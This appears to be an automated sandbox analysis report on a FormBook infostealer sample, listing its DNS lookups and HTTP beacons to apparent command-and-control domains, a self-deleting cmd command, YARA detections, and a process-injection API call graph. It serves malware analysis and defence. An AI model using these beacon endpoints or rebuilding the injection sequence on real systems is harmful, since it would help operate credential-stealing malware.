                                                                                                                                                                                                      Jun 3, 2024 08:51:59.273076057 CEST192.168.11.201.1.1.10x7329Standard query (0)www.veryaroma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:52:19.815931082 CEST192.168.11.201.1.1.10xf1c5Standard query (0)www.epuar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:52:40.373543024 CEST192.168.11.201.1.1.10x6a83Standard query (0)www.warehouse-inventory-80963.bondA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:53:03.212203026 CEST192.168.11.201.1.1.10xfe8fStandard query (0)www.jfgminimalist.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:53:21.458201885 CEST192.168.11.201.1.1.10x9936Standard query (0)www.ferradaoffroad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:53:41.969305038 CEST192.168.11.201.1.1.10x97f5Standard query (0)www.free-cell-phones-en-arena.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:54:02.496020079 CEST192.168.11.201.1.1.10x24aeStandard query (0)www.84031.vipA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:54:03.511154890 CEST192.168.11.209.9.9.90x24aeStandard query (0)www.84031.vipA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:54:23.022850990 CEST192.168.11.209.9.9.90x91aaStandard query (0)www.lotusluxecandle.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:55:06.289402008 CEST192.168.11.209.9.9.90x3f73Standard query (0)www.footresort.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:55:25.243534088 CEST192.168.11.209.9.9.90x4d9cStandard query (0)www.priuswuxi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                      Jun 3, 2024 08:47:32.960675001 CEST1.1.1.1192.168.11.200xc5d0No error (0)www.bolinkpass.club103.224.212.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:47:53.500461102 CEST1.1.1.1192.168.11.200x385dNo error (0)www.spiritualpath.info172.67.182.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:47:53.500461102 CEST1.1.1.1192.168.11.200x385dNo error (0)www.spiritualpath.info104.21.67.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:48:13.634320021 CEST1.1.1.1192.168.11.200x4d2No error (0)www.sugardefender24-usa.uswww.sugardefender24-usa.us.cdn.hstgr.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:48:13.634320021 CEST1.1.1.1192.168.11.200x4d2No error (0)www.sugardefender24-usa.us.cdn.hstgr.net84.32.84.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:48:33.813359976 CEST1.1.1.1192.168.11.200x5ad8Name error (3)www.nff1291.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:48:54.382339954 CEST1.1.1.1192.168.11.200xaa58No error (0)www.henslotalt.us172.67.158.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:48:54.382339954 CEST1.1.1.1192.168.11.200xaa58No error (0)www.henslotalt.us104.21.57.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:49:35.934587955 CEST1.1.1.1192.168.11.200x650fNo error (0)www.65302.vipfq.54cdn.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:49:35.934587955 CEST1.1.1.1192.168.11.200x650fNo error (0)fq.54cdn.vip40.81.24.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:49:56.138266087 CEST1.1.1.1192.168.11.200xb679Name error (3)www.lotusluxecandle.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:50:16.685075045 CEST1.1.1.1192.168.11.200x6b21No error (0)www.carneden.comcarneden.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:50:16.685075045 CEST1.1.1.1192.168.11.200x6b21No error (0)carneden.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:50:16.685075045 CEST1.1.1.1192.168.11.200x6b21No error (0)carneden.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:50:37.292650938 CEST1.1.1.1192.168.11.200x30fNo error (0)www.pedandmore.com103.169.142.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:50:57.814774990 CEST1.1.1.1192.168.11.200x2100No error (0)www.junongpei.website104.21.11.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:50:57.814774990 CEST1.1.1.1192.168.11.200x2100No error (0)www.junongpei.website172.67.166.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:51:18.326195955 CEST1.1.1.1192.168.11.200x5a67No error (0)www.winningpickleballshots.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:51:18.326195955 CEST1.1.1.1192.168.11.200x5a67No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:51:38.885360956 CEST1.1.1.1192.168.11.200x45d9Name error (3)www.thetrendingproduct.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:51:59.479312897 CEST1.1.1.1192.168.11.200x7329No error (0)www.veryaroma.com172.67.185.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:51:59.479312897 CEST1.1.1.1192.168.11.200x7329No error (0)www.veryaroma.com104.21.59.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:52:19.974755049 CEST1.1.1.1192.168.11.200xf1c5Name error (3)www.epuar.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:52:40.552776098 CEST1.1.1.1192.168.11.200x6a83No error (0)www.warehouse-inventory-80963.bond104.247.81.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:53:03.382316113 CEST1.1.1.1192.168.11.200xfe8fName error (3)www.jfgminimalist.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:53:21.648458958 CEST1.1.1.1192.168.11.200x9936No error (0)www.ferradaoffroad.comferradaoffroad.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:53:21.648458958 CEST1.1.1.1192.168.11.200x9936No error (0)ferradaoffroad.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:53:21.648458958 CEST1.1.1.1192.168.11.200x9936No error (0)ferradaoffroad.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:53:42.181104898 CEST1.1.1.1192.168.11.200x97f5No error (0)www.free-cell-phones-en-arena.sbs64.190.62.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:54:03.913429976 CEST9.9.9.9192.168.11.200x24aeNo error (0)www.84031.vipfq.54cdn.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:54:03.913429976 CEST9.9.9.9192.168.11.200x24aeNo error (0)fq.54cdn.vip40.81.24.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:54:04.014054060 CEST1.1.1.1192.168.11.200x24aeNo error (0)www.84031.vipfq.54cdn.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:54:04.014054060 CEST1.1.1.1192.168.11.200x24aeNo error (0)fq.54cdn.vip40.81.24.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:54:23.153611898 CEST9.9.9.9192.168.11.200x91aaName error (3)www.lotusluxecandle.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:55:06.421761036 CEST9.9.9.9192.168.11.200x3f73No error (0)www.footresort.com66.94.112.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:55:25.373941898 CEST9.9.9.9192.168.11.200x4d9cName error (3)www.priuswuxi.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                      • www.bolinkpass.club
                                                                                                                                                                                                      • www.spiritualpath.info

                                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      0192.168.11.2050410103.224.212.213805272C:\Windows\explorer.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      Jun 3, 2024 08:47:33.122865915 CEST170OUTGET /cr12/?XDHHT=vl9/KZA8hSVZlZYYRwiRPHDwK+fMeRW7mLcdcO2HrZ8WCY+A9QkbN6YtC02r8Olco4RS&MZt0=njKl2H4htFXPs HTTP/1.1
                                                                                                                                                                                                      Host: www.bolinkpass.club
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                      Jun 3, 2024 08:47:33.339585066 CEST434INHTTP/1.1 302 Found
                                                                                                                                                                                                      date: Mon, 03 Jun 2024 06:47:33 GMT
                                                                                                                                                                                                      server: Apache
                                                                                                                                                                                                      set-cookie: __tad=1717397253.7977802; expires=Thu, 01-Jun-2034 06:47:33 GMT; Max-Age=315360000
                                                                                                                                                                                                      location: http://ww25.bolinkpass.club/cr12/?XDHHT=vl9/KZA8hSVZlZYYRwiRPHDwK+fMeRW7mLcdcO2HrZ8WCY+A9QkbN6YtC02r8Olco4RS&MZt0=njKl2H4htFXPs&subid1=20240603-1647-3337-88d0-915e9f29f59e
                                                                                                                                                                                                      content-length: 2
                                                                                                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                      Data Raw: 0a 0a
                                                                                                                                                                                                      Data Ascii:


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      1192.168.11.2050411172.67.182.124805272C:\Windows\explorer.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      Jun 3, 2024 08:47:53.631791115 CEST173OUTGET /cr12/?XDHHT=EMrw1bwJWliw0FwpqVXnoYhnVkfUleLKpzdhUAtZvcFg+78qkpfmZQ0FVMWvYMkzI5s2&MZt0=njKl2H4htFXPs HTTP/1.1
                                                                                                                                                                                                      Host: www.spiritualpath.info
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                      Data Ascii:


                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                      Start time:02:46:36
                                                                                                                                                                                                      Start date:03/06/2024
                                                                                                                                                                                                      Path:C:\Users\user\Desktop\yPURXYpFVuXra2o.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"
                                                                                                                                                                                                      Imagebase:0xa60000
                                                                                                                                                                                                      File size:814'592 bytes
                                                                                                                                                                                                      MD5 hash:6C73961037087D34597FC8A582388BCC
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                      Start time:02:46:49
                                                                                                                                                                                                      Start date:03/06/2024
                                                                                                                                                                                                      Path:C:\Users\user\Desktop\yPURXYpFVuXra2o.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"
                                                                                                                                                                                                      Imagebase:0xd20000
                                                                                                                                                                                                      File size:814'592 bytes
                                                                                                                                                                                                      MD5 hash:6C73961037087D34597FC8A582388BCC
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                      Start time:02:46:49
                                                                                                                                                                                                      Start date:03/06/2024
                                                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                      Imagebase:0x7ff728d00000
                                                                                                                                                                                                      File size:4'849'904 bytes
                                                                                                                                                                                                      MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.35236192272.0000000013989000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                      Start time:02:46:58
                                                                                                                                                                                                      Start date:03/06/2024
                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Windows\SysWOW64\cscript.exe"
                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                      File size:144'896 bytes
                                                                                                                                                                                                      MD5 hash:13783FF4A2B614D7FBD58F5EEBDEDEF6
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                      Start time:02:47:01
                                                                                                                                                                                                      Start date:03/06/2024
                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:/c del "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"
                                                                                                                                                                                                      Imagebase:0x740000
                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                      Start time:02:47:01
                                                                                                                                                                                                      Start date:03/06/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      Imagebase:0x7ff793de0000
                                                                                                                                                                                                      File size:875'008 bytes
                                                                                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:15.5%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:140
                                                                                                                                                                                                        Total number of Limit Nodes:3
                                                                                                                                                                                                        execution_graph 13944 6c651ee 13949 6c65bc6 13944->13949 13967 6c65b60 13944->13967 13984 6c65b50 13944->13984 13945 6c651fd 13950 6c65b54 13949->13950 13951 6c65bc9 13949->13951 14001 6c65f07 13950->14001 14006 6c6617c 13950->14006 14011 6c6605f 13950->14011 14016 6c66931 13950->14016 14021 6c65fd1 13950->14021 14026 6c660d2 13950->14026 14030 6c66255 13950->14030 14035 6c66376 13950->14035 14040 6c666c8 13950->14040 14045 6c661ad 13950->14045 14050 6c6646c 13950->14050 14054 6c66382 13950->14054 14058 6c65f65 13950->14058 14063 6c66307 13950->14063 13952 6c65b82 13952->13945 13968 6c65b7a 13967->13968 13970 6c65f07 2 API calls 13968->13970 13971 6c66307 2 API calls 13968->13971 13972 6c65f65 2 API calls 13968->13972 13973 6c66382 2 API calls 13968->13973 13974 6c6646c 2 API calls 13968->13974 13975 6c661ad 2 API calls 13968->13975 13976 6c666c8 2 API calls 13968->13976 13977 6c66376 2 API calls 13968->13977 13978 6c66255 2 API calls 13968->13978 13979 6c660d2 2 API calls 13968->13979 13980 6c65fd1 2 API calls 13968->13980 13981 6c66931 2 API calls 13968->13981 13982 6c6605f 2 API calls 13968->13982 13983 6c6617c 2 API calls 13968->13983 13969 6c65b82 13969->13945 13970->13969 13971->13969 13972->13969 13973->13969 13974->13969 13975->13969 13976->13969 13977->13969 13978->13969 13979->13969 13980->13969 13981->13969 13982->13969 13983->13969 13985 6c65b54 13984->13985 13987 6c65f07 2 API calls 13985->13987 13988 6c66307 2 API calls 13985->13988 13989 6c65f65 2 API calls 13985->13989 13990 6c66382 2 API calls 13985->13990 13991 6c6646c 2 API calls 13985->13991 13992 6c661ad 2 API calls 13985->13992 13993 6c666c8 2 API calls 13985->13993 13994 6c66376 2 API calls 13985->13994 13995 6c66255 2 API calls 13985->13995 13996 6c660d2 2 API calls 13985->13996 13997 6c65fd1 2 API calls 13985->13997 13998 6c66931 2 API calls 13985->13998 13999 6c6605f 2 API calls 13985->13999 14000 6c6617c 2 API calls 13985->14000 13986 6c65b82 13986->13945 13987->13986 13988->13986 13989->13986 13990->13986 13991->13986 13992->13986 13993->13986 13994->13986 13995->13986 13996->13986 13997->13986 13998->13986 13999->13986 14000->13986 14002 6c65f0a 14001->14002 14003 6c66093 14002->14003 14068 6c64bb4 14002->14068 14072 6c64bc0 14002->14072 14007 6c66181 14006->14007 14008 6c660be 14007->14008 14076 6c63836 14007->14076 14080 6c63838 14007->14080 14008->13952 14012 6c66065 14011->14012 14014 6c64bb4 CreateProcessA 14012->14014 14015 6c64bc0 CreateProcessA 14012->14015 14013 6c66093 14014->14013 14015->14013 14017 6c6626c 14016->14017 14018 6c6628d 14016->14018 14084 6c64820 14017->14084 14088 6c64828 14017->14088 14018->13952 14022 6c65f3d 14021->14022 14023 6c66093 14022->14023 14024 6c64bb4 CreateProcessA 14022->14024 14025 6c64bc0 CreateProcessA 14022->14025 14024->14023 14025->14023 14092 6c63d60 14026->14092 14096 6c63d58 14026->14096 14027 6c660f1 14027->13952 14031 6c6625b 14030->14031 14033 6c64820 WriteProcessMemory 14031->14033 14034 6c64828 WriteProcessMemory 14031->14034 14032 6c6628d 14032->13952 14033->14032 14034->14032 14036 6c66944 14035->14036 14101 6c66c88 14036->14101 14106 6c66c98 14036->14106 14037 6c66960 14041 6c666ce 14040->14041 14119 6c64981 14041->14119 14123 6c64988 14041->14123 14042 6c666f4 14046 6c661c4 14045->14046 14048 6c63836 ResumeThread 14046->14048 14049 6c63838 ResumeThread 14046->14049 14047 6c660be 14047->13952 14048->14047 14049->14047 14052 6c64820 WriteProcessMemory 14050->14052 14053 6c64828 WriteProcessMemory 14050->14053 14051 6c660be 14051->13952 14052->14051 14053->14051 14056 6c64820 WriteProcessMemory 14054->14056 14057 6c64828 WriteProcessMemory 14054->14057 14055 6c663b0 14056->14055 14057->14055 14059 6c65f6b 14058->14059 14060 6c66093 14059->14060 14061 6c64bb4 CreateProcessA 14059->14061 14062 6c64bc0 CreateProcessA 14059->14062 14061->14060 14062->14060 14064 6c66830 14063->14064 14066 6c63d60 Wow64SetThreadContext 14064->14066 14067 6c63d58 Wow64SetThreadContext 14064->14067 14065 6c6684b 14066->14065 14067->14065 14069 6c64bb8 CreateProcessA 14068->14069 14071 6c64ea5 14069->14071 14071->14071 14073 6c64c47 CreateProcessA 14072->14073 14075 6c64ea5 14073->14075 14075->14075 14077 6c6387c ResumeThread 14076->14077 14079 6c638ce 14077->14079 14079->14008 14081 6c6387c ResumeThread 14080->14081 14083 6c638ce 14081->14083 14083->14008 14085 6c64824 WriteProcessMemory 14084->14085 14087 6c64913 14085->14087 14087->14018 14089 6c64874 WriteProcessMemory 14088->14089 14091 6c64913 14089->14091 14091->14018 14093 6c63da9 Wow64SetThreadContext 14092->14093 14095 6c63e27 14093->14095 14095->14027 14097 6c63d5e Wow64SetThreadContext 14096->14097 14098 6c63d5c 14096->14098 14100 6c63e27 14097->14100 14098->14027 14100->14027 14102 6c66cad 14101->14102 14111 6c64700 14102->14111 14115 6c646f8 14102->14115 14103 6c66ccc 14103->14037 14107 6c66cad 14106->14107 14109 6c64700 VirtualAllocEx 14107->14109 14110 6c646f8 VirtualAllocEx 14107->14110 14108 6c66ccc 14108->14037 14109->14108 14110->14108 14112 6c64744 VirtualAllocEx 14111->14112 14114 6c647c2 14112->14114 14114->14103 14116 6c646fc VirtualAllocEx 14115->14116 14118 6c647c2 14116->14118 14118->14103 14120 6c64984 ReadProcessMemory 14119->14120 14122 6c64a52 14120->14122 14122->14042 14124 6c649d4 ReadProcessMemory 14123->14124 14126 6c64a52 14124->14126 14126->14042

                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                        Function 015C1110 Relevance: 22.3, Strings: 17, Instructions: 1063COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $ $%$&$&$7$7$X,q$Y$a$g$g$k$k$k$k$$wq
                                                                                                                                                                                                        • API String ID: 0-2275180334
                                                                                                                                                                                                        • Opcode ID: 1c919216eaf88c7aaf618f6fe96e23e4cf28d0bfb16c2b9b2113209ee47d6633
                                                                                                                                                                                                        • Instruction ID: 9d302e89e76a8a9d0c356763047fa4f3ed0eccfb05e3cb06ff24e1cd7e7298b2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c919216eaf88c7aaf618f6fe96e23e4cf28d0bfb16c2b9b2113209ee47d6633
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2A21A34600706CFC715EF74C854BAAB7B2BFD9700F618AADD45A6B3A0DB71A985CB40
                                                                                                                                                                                                        Function 015C04D4 Relevance: 22.3, Strings: 17, Instructions: 1046COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
